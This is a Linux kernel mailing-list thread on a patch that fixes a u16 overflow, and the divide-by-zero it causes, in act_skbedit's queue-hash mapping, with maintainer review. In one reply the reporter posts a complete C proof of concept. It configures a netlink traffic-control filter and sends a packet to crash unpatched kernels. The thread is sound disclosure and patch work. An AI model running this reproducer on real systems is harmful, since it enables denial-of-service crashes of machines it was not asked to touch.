[PATCH v2] net/sched: act_skbedit: fix divide-by-zero in tcf_skbedit_hash()

Ruitong Liu posted 1 patch 1 month, 2 weeks ago
There is a newer version of this series
net/sched/act_skbedit.c | 4 ++++
1 file changed, 4 insertions(+)
[PATCH v2] net/sched: act_skbedit: fix divide-by-zero in tcf_skbedit_hash()
Posted by Ruitong Liu 1 month, 2 weeks ago
Commit 38a6f0865796 ("net: sched: support hash selecting tx queue")
added SKBEDIT_F_TXQ_SKBHASH support. mapping_mod is computed as:

  mapping_mod = queue_mapping_max - queue_mapping + 1;

mapping_mod is stored as u16, so the calculation can overflow when the
requested range covers 65536 queues (e.g. queue_mapping=0 and
queue_mapping_max=0xffff). In that case mapping_mod wraps to 0 and
tcf_skbedit_hash() triggers a divide-by-zero:

  queue_mapping += skb_get_hash(skb) % params->mapping_mod;

Reject such invalid configuration to prevent mapping_mod from becoming
0 and avoid the crash.

Fixes: 38a6f0865796 ("net: sched: support hash selecting tx queue")
Cc: stable@vger.kernel.org # 6.12+
Reported-by: Ruitong Liu <cnitlrt@gmail.com>
Reported-by: Shuyuan Liu <L0x1c3r@gmail.com>
Signed-off-by: Ruitong Liu <cnitlrt@gmail.com>
---
 net/sched/act_skbedit.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/net/sched/act_skbedit.c b/net/sched/act_skbedit.c
index 8c1d1554f657..b6f5c21651fc 100644
--- a/net/sched/act_skbedit.c
+++ b/net/sched/act_skbedit.c
@@ -194,6 +194,10 @@ static int tcf_skbedit_init(struct net *net, struct nlattr *nla,
 			}
 
 			mapping_mod = *queue_mapping_max - *queue_mapping + 1;
+			if (!mapping_mod) {
+				NL_SET_ERR_MSG_MOD(extack, "Invalid queue_mapping range: range too large");
+				return -EINVAL;
+			}
 			flags |= SKBEDIT_F_TXQ_SKBHASH;
 		}
 		if (*pure_flags & SKBEDIT_F_INHERITDSFIELD)
-- 
2.34.1
Re: [PATCH v2] net/sched: act_skbedit: fix divide-by-zero in tcf_skbedit_hash()
Posted by Jakub Kicinski 1 month, 2 weeks ago
On Thu, 12 Feb 2026 03:43:25 +0800 Ruitong Liu wrote:
> Commit 38a6f0865796 ("net: sched: support hash selecting tx queue")
> added SKBEDIT_F_TXQ_SKBHASH support. mapping_mod is computed as:
> 
>   mapping_mod = queue_mapping_max - queue_mapping + 1;
> 
> mapping_mod is stored as u16, so the calculation can overflow when the
> requested range covers 65536 queues (e.g. queue_mapping=0 and
> queue_mapping_max=0xffff). In that case mapping_mod wraps to 0 and
> tcf_skbedit_hash() triggers a divide-by-zero:
> 
>   queue_mapping += skb_get_hash(skb) % params->mapping_mod;
> 
> Reject such invalid configuration to prevent mapping_mod from becoming
> 0 and avoid the crash.

How did you find this bug? Do you have a repro to trigger the issue
you're describing?

> @@ -194,6 +194,10 @@ static int tcf_skbedit_init(struct net *net, struct nlattr *nla,
>  			}
>  
>  			mapping_mod = *queue_mapping_max - *queue_mapping + 1;
> +			if (!mapping_mod) {
> +				NL_SET_ERR_MSG_MOD(extack, "Invalid queue_mapping range: range too large");
> +				return -EINVAL;
> +			}
>  			flags |= SKBEDIT_F_TXQ_SKBHASH;
>  		}
>  		if (*pure_flags & SKBEDIT_F_INHERITDSFIELD)


There is this check right above the lines you're touching:

			if (*queue_mapping_max < *queue_mapping) {
				NL_SET_ERR_MSG_MOD(extack, "The range of queue_mapping is invalid, max < min.");
				return -EINVAL;
			}

I don't see how mapping_mod can be 0 here.
-- 
pw-bot: reject
Re: [PATCH v2] net/sched: act_skbedit: fix divide-by-zero in tcf_skbedit_hash()
Posted by RUITONG LIU 1 month, 2 weeks ago
With queue_mapping = 0 and queue_mapping_max = 65535, the existing
validation passes because it only checks queue_mapping_max <
queue_mapping, which is false. The code then computes the inclusive
range size:
mapping_mod = queue_mapping_max - queue_mapping + 1 = 65536.
However, mapping_mod is stored in a u16, so 65536 wraps to 0. This 0
value is later used as the divisor in a modulo operation (hash %
mapping_mod), causing a divide-by-zero.

This is the poc, and we use agent found this bug
```c
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <linux/if_ether.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tc_act/tc_skbedit.h>
#include <net/if.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef SKBEDIT_F_TXQ_SKBHASH
#define SKBEDIT_F_TXQ_SKBHASH 0x40
#endif

#ifndef TCA_SKBEDIT_QUEUE_MAPPING_MAX
#define TCA_SKBEDIT_QUEUE_MAPPING_MAX 10
#endif

#define BUF_SIZE 8192

#define NLMSG_TAIL(nmsg) \
    ((struct nlattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))

static int addattr_l(struct nlmsghdr *n, size_t maxlen, int type,
                     const void *data, size_t alen) {
    size_t len = NLA_ALIGN(alen) + NLA_HDRLEN;
    size_t newlen = NLMSG_ALIGN(n->nlmsg_len) + len;
    if (newlen > maxlen)
        return -1;
    struct nlattr *na = NLMSG_TAIL(n);
    na->nla_type = type;
    na->nla_len = NLA_HDRLEN + alen;
    if (alen && data)
        memcpy((char *)na + NLA_HDRLEN, data, alen);
    n->nlmsg_len = newlen;
    return 0;
}

static struct nlattr *addattr_nest(struct nlmsghdr *n, size_t maxlen,
int type) {
    struct nlattr *start = NLMSG_TAIL(n);
    if (addattr_l(n, maxlen, type | NLA_F_NESTED, NULL, 0) < 0)
        return NULL;
    return start;
}

static int addattr_nest_end(struct nlmsghdr *n, struct nlattr *start) {
    start->nla_len = (char *)NLMSG_TAIL(n) - (char *)start;
    return n->nlmsg_len;
}

static int nl_talk(int fd, struct nlmsghdr *nlh) {
    struct sockaddr_nl nladdr = {0};
    nladdr.nl_family = AF_NETLINK;

    struct iovec iov = {0};
    iov.iov_base = nlh;
    iov.iov_len = nlh->nlmsg_len;

    struct msghdr msg = {0};
    msg.msg_name = &nladdr;
    msg.msg_namelen = sizeof(nladdr);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    if (sendmsg(fd, &msg, 0) < 0)
        return -errno;

    char buf[BUF_SIZE];
    while (1) {
        int len = recv(fd, buf, sizeof(buf), 0);
        if (len < 0) {
            if (errno == EINTR)
                continue;
            return -errno;
        }
        struct nlmsghdr *h;
        for (h = (struct nlmsghdr *)buf; NLMSG_OK(h, len);
             h = NLMSG_NEXT(h, len)) {
            if (h->nlmsg_type == NLMSG_ERROR) {
                struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);
                if (err->error == 0)
                    return 0;
                return err->error;
            }
        }
    }
}

static int add_clsact_qdisc(int fd, int ifindex, int *seq) {
    struct {
        struct nlmsghdr n;
        struct tcmsg t;
        char buf[256];
    } req = {0};

    req.n.nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    req.n.nlmsg_type = RTM_NEWQDISC;
    req.n.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE |
NLM_F_REPLACE;
    req.n.nlmsg_seq = ++(*seq);
    req.n.nlmsg_pid = getpid();

    req.t.tcm_family = AF_UNSPEC;
    req.t.tcm_ifindex = ifindex;
    req.t.tcm_parent = TC_H_CLSACT;
    req.t.tcm_handle = TC_H_MAKE(TC_H_INGRESS, 0);

    const char kind[] = "clsact";
    if (addattr_l(&req.n, sizeof(req), TCA_KIND, kind, sizeof(kind)) < 0)
        return -1;

    return nl_talk(fd, &req.n);
}

static int add_u32_filter_skbedit(int fd, int ifindex, int *seq) {
    struct {
        struct nlmsghdr n;
        struct tcmsg t;
        char buf[1024];
    } req = {0};

    req.n.nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    req.n.nlmsg_type = RTM_NEWTFILTER;
    req.n.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
    req.n.nlmsg_seq = ++(*seq);
    req.n.nlmsg_pid = getpid();

    req.t.tcm_family = AF_UNSPEC;
    req.t.tcm_ifindex = ifindex;
    req.t.tcm_parent = TC_H_MAKE(TC_H_CLSACT, TC_H_MIN_EGRESS);
    req.t.tcm_handle = 0;
    req.t.tcm_info = TC_H_MAKE(1 << 16, htons(ETH_P_ALL));

    const char kind[] = "u32";
    if (addattr_l(&req.n, sizeof(req), TCA_KIND, kind, sizeof(kind)) < 0)
        return -1;

    struct nlattr *opts = addattr_nest(&req.n, sizeof(req), TCA_OPTIONS);
    if (!opts)
        return -1;

    /* u32 selector: one key that always matches */
    char selbuf[sizeof(struct tc_u32_sel) + sizeof(struct tc_u32_key)];
    memset(selbuf, 0, sizeof(selbuf));
    struct tc_u32_sel *sel = (struct tc_u32_sel *)selbuf;
    struct tc_u32_key *key = (struct tc_u32_key *)(sel->keys);

    sel->flags = TC_U32_TERMINAL;
    sel->offshift = 0;
    sel->nkeys = 1;
    sel->offmask = 0;
    sel->off = 0;
    sel->offoff = 0;
    sel->hoff = 0;
    sel->hmask = htonl(0);

    key->mask = 0;
    key->val = 0;
    key->off = 0;
    key->offmask = 0;

    if (addattr_l(&req.n, sizeof(req), TCA_U32_SEL, selbuf, sizeof(selbuf)) < 0)
        return -1;

    struct nlattr *act = addattr_nest(&req.n, sizeof(req), TCA_U32_ACT);
    if (!act)
        return -1;

    struct nlattr *act1 = addattr_nest(&req.n, sizeof(req), 1);
    if (!act1)
        return -1;

    const char act_kind[] = "skbedit";
    if (addattr_l(&req.n, sizeof(req), TCA_ACT_KIND, act_kind,
sizeof(act_kind)) < 0)
        return -1;

    struct nlattr *act_opts = addattr_nest(&req.n, sizeof(req),
TCA_ACT_OPTIONS);
    if (!act_opts)
        return -1;

    struct tc_skbedit parm = {0};
    parm.action = TC_ACT_OK;
    parm.index = 0;

    if (addattr_l(&req.n, sizeof(req), TCA_SKBEDIT_PARMS, &parm,
sizeof(parm)) < 0)
        return -1;

    uint16_t qmap = 0;
    uint16_t qmap_max = 0xFFFFu;
    uint64_t flags = SKBEDIT_F_TXQ_SKBHASH;

    if (addattr_l(&req.n, sizeof(req), TCA_SKBEDIT_QUEUE_MAPPING,
&qmap, sizeof(qmap)) < 0)
        return -1;
    if (addattr_l(&req.n, sizeof(req), TCA_SKBEDIT_QUEUE_MAPPING_MAX,
&qmap_max, sizeof(qmap_max)) < 0)
        return -1;
    if (addattr_l(&req.n, sizeof(req), TCA_SKBEDIT_FLAGS, &flags,
sizeof(flags)) < 0)
        return -1;

    addattr_nest_end(&req.n, act_opts);
    addattr_nest_end(&req.n, act1);
    addattr_nest_end(&req.n, act);
    addattr_nest_end(&req.n, opts);

    return nl_talk(fd, &req.n);
}

static int trigger_packet(const char *ifname) {
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0)
        return -errno;

    if (ifname) {
        if (setsockopt(s, SOL_SOCKET, SO_BINDTODEVICE, ifname,
                       strlen(ifname) + 1) < 0) {
            int err = -errno;
            close(s);
            return err;
        }
    }

    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(12345);
    addr.sin_addr.s_addr = inet_addr("10.0.2.2");

    char buf[64] = "trigger";
    int ret = sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&addr,
sizeof(addr));
    if (ret < 0) {
        int err = -errno;
        close(s);
        return err;
    }

    close(s);
    return 0;
}

int main(void) {
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (fd < 0) {
        perror("socket(NETLINK_ROUTE)");
        return 1;
    }

    struct sockaddr_nl local = {0};
    local.nl_family = AF_NETLINK;
    local.nl_pid = getpid();
    if (bind(fd, (struct sockaddr *)&local, sizeof(local)) < 0) {
        perror("bind");
        return 1;
    }

    const char *ifname = "eth0";
    int ifindex = if_nametoindex(ifname);
    if (!ifindex) {
        ifname = "lo";
        ifindex = if_nametoindex(ifname);
        if (!ifindex) {
            perror("if_nametoindex(eth0/lo)");
            return 1;
        }
    }

    int seq = 0;
    int err = add_clsact_qdisc(fd, ifindex, &seq);
    if (err && err != -EEXIST) {
        fprintf(stderr, "add clsact qdisc failed: %s (%d)\n",
strerror(-err), err);
        return 1;
    }

    err = add_u32_filter_skbedit(fd, ifindex, &seq);
    if (err) {
        fprintf(stderr, "add u32 skbedit filter failed: %s (%d)\n",
strerror(-err), err);
        return 1;
    }

    err = trigger_packet(ifname);
    if (err) {
        fprintf(stderr, "trigger_packet failed: %s (%d)\n",
strerror(-err), err);
        return 1;
    }

    printf("skbedit filter installed and packet sent. Check kernel log
for crash/KASAN.\n");
    return 0;
}
```

Jakub Kicinski <kuba@kernel.org> 于2026年2月12日周四 19:08写道:
>
> On Thu, 12 Feb 2026 03:43:25 +0800 Ruitong Liu wrote:
> > Commit 38a6f0865796 ("net: sched: support hash selecting tx queue")
> > added SKBEDIT_F_TXQ_SKBHASH support. mapping_mod is computed as:
> >
> >   mapping_mod = queue_mapping_max - queue_mapping + 1;
> >
> > mapping_mod is stored as u16, so the calculation can overflow when the
> > requested range covers 65536 queues (e.g. queue_mapping=0 and
> > queue_mapping_max=0xffff). In that case mapping_mod wraps to 0 and
> > tcf_skbedit_hash() triggers a divide-by-zero:
> >
> >   queue_mapping += skb_get_hash(skb) % params->mapping_mod;
> >
> > Reject such invalid configuration to prevent mapping_mod from becoming
> > 0 and avoid the crash.
>
> How did you find this bug? Do you have a repro to trigger the issue
> you're describing?
>
> > @@ -194,6 +194,10 @@ static int tcf_skbedit_init(struct net *net, struct nlattr *nla,
> >                       }
> >
> >                       mapping_mod = *queue_mapping_max - *queue_mapping + 1;
> > +                     if (!mapping_mod) {
> > +                             NL_SET_ERR_MSG_MOD(extack, "Invalid queue_mapping range: range too large");
> > +                             return -EINVAL;
> > +                     }
> >                       flags |= SKBEDIT_F_TXQ_SKBHASH;
> >               }
> >               if (*pure_flags & SKBEDIT_F_INHERITDSFIELD)
>
>
> There is this check right above the lines you're touching:
>
>                         if (*queue_mapping_max < *queue_mapping) {
>                                 NL_SET_ERR_MSG_MOD(extack, "The range of queue_mapping is invalid, max < min.");
>                                 return -EINVAL;
>                         }
>
> I don't see how mapping_mod can be 0 here.
> --
> pw-bot: reject
Re: [PATCH v2] net/sched: act_skbedit: fix divide-by-zero in tcf_skbedit_hash()
Posted by Jakub Kicinski 1 month, 2 weeks ago
On Thu, 12 Feb 2026 20:29:20 -0700 RUITONG LIU wrote:
> With queue_mapping = 0 and queue_mapping_max = 65535, the existing
> validation passes because it only checks queue_mapping_max <
> queue_mapping, which is false. The code then computes the inclusive
> range size:
> mapping_mod = queue_mapping_max - queue_mapping + 1 = 65536.
> However, mapping_mod is stored in a u16, so 65536 wraps to 0. This 0
> value is later used as the divisor in a modulo operation (hash %
> mapping_mod), causing a divide-by-zero.

I see, thanks, could you please use the version of the patch
that Eric posted? It's much more intuitive than checking for 0.
Maybe use U16_MAX instead of 0xffff, too